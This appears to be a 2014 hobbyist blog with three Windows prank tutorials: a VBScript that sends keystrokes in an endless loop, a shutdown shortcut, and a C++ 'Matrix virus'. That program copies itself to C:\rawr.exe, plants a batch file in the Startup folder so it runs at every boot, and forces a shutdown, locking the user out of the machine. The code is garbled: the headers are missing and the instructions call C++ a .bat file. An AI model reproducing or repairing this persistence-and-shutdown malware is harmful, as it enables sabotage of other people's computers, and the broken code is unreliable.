Show "DON'T MESS WITH ME"

To type a custom message "DON'T MESS WITH ME" continuously popping up using Notepad, just follow the simple steps given below:
Step 1: Open Notepad.
Step 2: Select all and copy-paste the code below there.
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “DON'T MESS WITH ME.”
loop
Step 3: Save the file as "Whatever-You-Want.vbs", that is, with the .vbs extension.
Step 4: Now open that file by double-clicking on it.
Step 5: Your message will pop up continuously.
Step 6: Enjoy.


Wednesday, 15 October 2014

ShutDown PC

1. Right-click on the desktop.
2. Click Shortcut.
3. If you want, you can add a personalized message to the shutdown notice by using the -c flag. Using the above example, type shutdown.exe -s -t 45 -c "comment". The comment must be in quotes. For example, you can let the user know how long until the shutdown begins by typing shutdown.exe -s -t 45 -c "Computer will shut down in 45 seconds".


Friday, 10 October 2014

MAKING MOST DANGEROUS VIRUS CALLED MATRIX

Warning - Do not run it on your computer
I'm gonna teach you how to make a virus named Matrix...
1-Open notepad
2-Put in this code

#include
#include
#include
#include
#include
#include
#include
using namespace std;

int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);

{
char buffer[255];
char inputFile[]="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\Documents and Settings\All Users\Start Menu\Programs\Startup\rawr.bat", ios::app);
fp << "@ECHO OFF n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}

{
char buffer[255];
char inputFile[]="C:\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF n";
fp << "COPY matrix.exe C:\rawr.exe n";
fp << "START C:\rawr.exe n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}

START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " ";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
3-save it as matrix.bat
4-finish then compile it using this.. http://rapidshare.com/files/172088914/QuickBFC.exe and finally it should be matrix.exe